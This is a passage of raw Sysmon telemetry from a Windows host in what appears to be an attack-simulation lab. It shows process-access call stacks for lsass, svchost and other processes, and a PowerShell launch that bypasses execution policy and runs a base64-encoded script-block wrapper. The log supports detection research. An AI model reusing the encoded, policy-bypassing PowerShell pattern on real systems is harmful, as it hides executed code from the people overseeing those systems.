15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7CB0-5FA1-B800-000000008801}13324356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311cacd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311ca2a7(wow64) 154100x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.397{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.343{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.343{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.296{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wwl5ipyc.lvk.ps12020-11-03 15:52:16.296 10341000x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.280{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 